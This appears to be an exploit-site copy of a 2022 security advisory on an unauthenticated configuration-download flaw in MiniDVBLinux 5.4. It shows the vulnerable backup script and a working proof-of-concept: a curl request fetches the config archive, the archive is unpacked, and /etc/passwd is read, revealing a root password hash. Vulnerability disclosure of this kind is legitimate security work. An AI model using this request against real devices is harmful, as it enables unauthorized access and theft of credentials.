Exploit for MiniDVBLinux 5.4 Configuration Download

Name: Exploit for MiniDVBLinux 5.4 Configuration Download
Rating: 5 (159 reviews)
2022-10-17 | CVSS -0.5
## https://sploitus.com/exploit?id=PACKETSTORM:168731
MiniDVBLinux 5.4 Config Download Exploit  
  
  
Vendor: MiniDVBLinux  
Product web page: https://www.minidvblinux.de  
Affected version: <=5.4  
  
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
way to convert a standard PC into a Multi Media Centre based on the  
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
Linux based Digital Video Recorder: Watch TV, Timer controlled  
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
via browser, and a lot more. MLD strives to be as small as possible,  
modular, simple. It supports numerous hardware platforms, like classic  
desktops in 32/64bit and also various low power ARM systems.  
  
Desc: The application is vulnerable to unauthenticated configuration  
download when direct object reference is made to the backup function  
using an HTTP GET request. This will enable the attacker to disclose  
sensitive information and help her in authentication bypass, privilege  
escalation and full system access.  
  
====================================================================  
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:  
------------------------------------------------------------  
01: <?  
02: if [ "$GET_action" = "getconfig" ]; then  
03: . /etc/rc.config  
04: header "Content-Type: application/x-compressed-tar"  
05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"  
06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null  
07: cat /tmp/backup_config_$$.tgz  
08: rm -rf /tmp/backup_config*  
09: exit  
10: fi  
11: ?>  
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>  
  
====================================================================  
  
Tested on: MiniDVBLinux 5.4  
BusyBox v1.25.1  
Architecture: armhf, armhf-rpi2  
GNU/Linux 4.19.127.203 (armv7l)  
VideoDiskRecorder 2.4.6  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5713  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php  
  
  
24.09.2022  
  
--  
  
  
> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz  
> mkdir configdir  
> tar -xvzf config.tgz -C .\configdir  
> cd configdir && cd etc  
> type passwd  
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh  
daemon:!:1:1::/:  
ftp:!:40:2:FTP account:/:/bin/sh  
user:!:500:500::/home/user:/bin/sh  
nobody:!:65534:65534::/tmp:  
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin  
>